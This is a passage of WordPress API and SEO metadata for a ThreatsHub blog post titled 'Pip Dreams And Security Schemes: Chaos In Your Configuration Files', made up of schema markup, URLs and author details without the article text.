Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pip Dreams And Security Schemes: Chaos In Your Configuration Files 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/","og_locale":"en_US","og_type":"article","og_title":"Pip Dreams And Security Schemes: Chaos In Your Configuration Files 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-09-18T17:57:13+00:00","og_image":[{"url":"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/2-pips-300x126.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Pip Dreams And Security Schemes: Chaos In Your Configuration Files","datePublished":"2024-09-18T17:57:13+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/"},"wordCount":1612,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png","keywords":["headline,backdoor"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/","url":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/","name":"Pip Dreams And Security Schemes: Chaos In Your Configuration Files 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png","datePublished":"2024-09-18T17:57:13+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png","width":300,"height":126},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,backdoor","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinebackdoor\/"},{"@type":"ListItem","position":3,"name":"Pip Dreams And Security Schemes: Chaos In Your Configuration Files"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57130","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57130"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57130\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/57131"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57130"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57130"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57130"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}